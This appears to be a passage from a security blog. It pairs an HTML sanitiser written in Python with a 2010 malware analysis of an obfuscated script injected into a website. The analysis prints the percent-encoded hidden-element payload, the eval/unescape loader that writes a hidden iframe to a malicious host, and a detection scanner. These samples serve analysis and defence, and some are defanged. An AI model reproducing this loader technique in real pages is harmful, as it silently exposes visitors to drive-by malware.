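class PostPolicyFilter(HTMLParser):
    # Rebuilds the HTML, dropping <script>, clamping iframe sizes, filtering hrefs.
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.in_script, self.dropped = [], False, []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.dropped.append("script")
            return
        if tag == "iframe":
            attrs = [(k, self._clamp(v) if k in ("width", "height") else v)
                     for k, v in attrs]
        elif tag == "a":
            attrs = [(k, v) for k, v in attrs
                     if not (k == "href" and self._blocked(v))]
        self.out.append("<%s%s>" % (tag, "".join(
            ' %s="%s"' % (k, escape(v or "")) for k, v in attrs)))
    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
        else:
            self.out.append("</%s>" % tag)
    def handle_data(self, data):
        if not self.in_script:  # script bodies are never echoed back
            self.out.append(escape(data, quote=False))
    def _clamp(self, value):
        # Numeric sizes are capped; anything else ("100%") becomes the cap.
        ok = (value or "").isdigit()
        return str(min(int(value), MAX_IFRAME_PX) if ok else MAX_IFRAME_PX)
    def _blocked(self, url):
        host = (urlparse(url or "").hostname or "").lower()
        if host in LINK_BLOCKLIST:
            self.dropped.append("link:" + host)
        return host in LINK_BLOCKLIST
def filter_post(html):  # returns (sanitised_html, dropped_items)
    f = PostPolicyFilter()
    f.feed(html)
    f.close()
    return "".join(f.out), f.dropped
```

This example covers only the three behaviours the post reports; a production filter would also have to handle event-handler attributes and URL schemes.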

Conclusions
We have seen that there are some attack vectors which malicious entities could employ against services like Posterous as a tool to spread malware: primarily, the use of iframes and malicious links.

Even if Posterous begins to pre-filter links, as we have shown in a previous article (Analyzing URL Shorteners), these services are a thorn in the side of security policies. Unfortunately, as each new service like Posterous comes to life on the Internet, so do new attack vectors for malicious entities.

Till next time…

Update: Gary Tan from Posterous was kind enough to swiftly reply back to our questions and provide good information (Monday, July 12, 2010). Our findings have been updated appropriately.


An Interesting Sample of Malware

January 21st, 2010

This afternoon, a post on Badwarebusters.org reminded me of a somewhat interesting piece of malicious code I have not seen for some time. Our scanners flagged it as malware.

The original post is found here, answered by redleg on Badwarebusters.org.

This malware, found embedded in “eslpod.com/website/index.php”, is displayed below. The code has been slightly modified so as not to work as intended if loaded up and run in a browser.

<h4 id="Fl" style="display:none;">%64%6f%63%75%6d%65%6e%74%2e%77%72%74%65%28%22%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%22%68%74%74%70%3a%2f%2f%74%72%61%66%2e%74%72%61%6e%73%63%6f%6e%74%69%6e%65%6e%74%61%6c%2d%73%65%72%76%69%63%65%2e%67%2f%69%6e%64%65%78%2e%70%68%70%5c%22%20%73%74%79%6c%65%3d%5c%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%5c%22%3e%3c%2f%69%66%72%61%6d%65%3e%22%29%3b</h4>

<script>
ar aK=docume nt.getElem entById("Fl"), A x=ev al;
aK = aK.inne rHTML;
Ax(unescape(aK));
</script>

It is interesting to see how hackers are trying out new tricks to fool scanning systems. Most code-injection attacks deliver the payload directly within the script tags. Here, the case is slightly different. The individual has attempted to disguise the malicious payload as a simple web element inside the page, then retrieves it using JavaScript and the getElementById function. The code then proceeds to execute the malicious payload.
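An added example, not from the post or from Badwarebusters: the Python scanner below looks for the carrier pattern described here, a hidden element whose text is nothing but %XX sequences plus a script that reads it via getElementById and unescape(), and decodes the stash statically so the payload can be inspected without running it. The page fragment is constructed to mirror the sample; the decoded payload and its hostname are placeholders.

```python
import re
from urllib.parse import unquote

# A hidden element whose text body is nothing but %XX sequences.
HIDDEN_ENCODED = re.compile(
    r"<(\w+)\b[^>]*display\s*:\s*none[^>]*>\s*((?:%[0-9a-fA-F]{2})+)\s*</\1>",
    re.I | re.S)
# A loader that reads an element by id and passes it through unescape().
LOADER = re.compile(
    r"getElementById\s*\(\s*[\"'](\w+)[\"']\s*\)[^<]*?unescape\s*\(", re.I | re.S)
ELEMENT_ID = re.compile(r"\bid\s*=\s*[\"'](\w+)[\"']", re.I)

def find_stashed_payloads(html):
    """Statically decode percent-encoded text stashed in hidden elements and
    report whether a matching loader script is present on the same page."""
    loader_ids = set(LOADER.findall(html))
    findings = []
    for m in HIDDEN_ENCODED.finditer(html):
        id_m = ELEMENT_ID.search(m.group(0))
        elem_id = id_m.group(1) if id_m else None
        decoded = unquote(m.group(2))
        findings.append({
            "tag": m.group(1).lower(),
            "id": elem_id,
            "decoded": decoded,
            "loader_present": elem_id in loader_ids,
            "writes_hidden_iframe": bool(re.search(
                r"document\.write\s*\(.*<iframe[^>]*display\s*:\s*none",
                decoded, re.I | re.S)),
        })
    return findings

# Constructed page fragment modelled on the sample in the post; the payload
# and its hostname are placeholders, not the values seen on eslpod.com.
PAYLOAD = ('document.write("<iframe src=\\"http://malware.example/index.php\\" '
           'style=\\"display:none;\\"></iframe>");')
PAGE = ('<h4 id="Fl" style="display:none;">'
        + "".join("%%%02x" % ord(c) for c in PAYLOAD) + '</h4>\n'
        '<script>\nvar aK=document.getElementById("Fl"), Ax=eval;\n'
        'aK = aK.innerHTML;\nAx(unescape(aK));\n</script>')
```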

The payload by itself is not so interesting. It has been known to appear in different variants before this particular example.

The payload is displayed below:

document.wri te("<ifra me src=\"hxxp://traff.tr anscon tin enta l-serv ice.org/i n dex.php\" style=\"dis play:none;\"></ifr me>");

The iframe referenced here points to the following:

<!--LiveInternet counter-->
<script t ype="text/javascript">
<!--
document.write("<a href='hxxp://www.li veinte rnet.ru/click' "+
"target=_blank><img src='hxxp://cou nter.yad ro.ru/hit?t52.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+"' alt='' title='LiveInternet: ïîêàçàíî ÷èñëî ïðîñìîòðîâ è"+
" ïîñåòèòåëåé çà 24 ÷àñà' "+"border='0' width='88' height='31'><\/a>")
//-->
</script>
<!--/LiveInternet-->

This snippet should be flagged by many scanning services simply because of the reputation of the sites mentioned inside it (see Malware Patrol).

Till next time, surf safe.
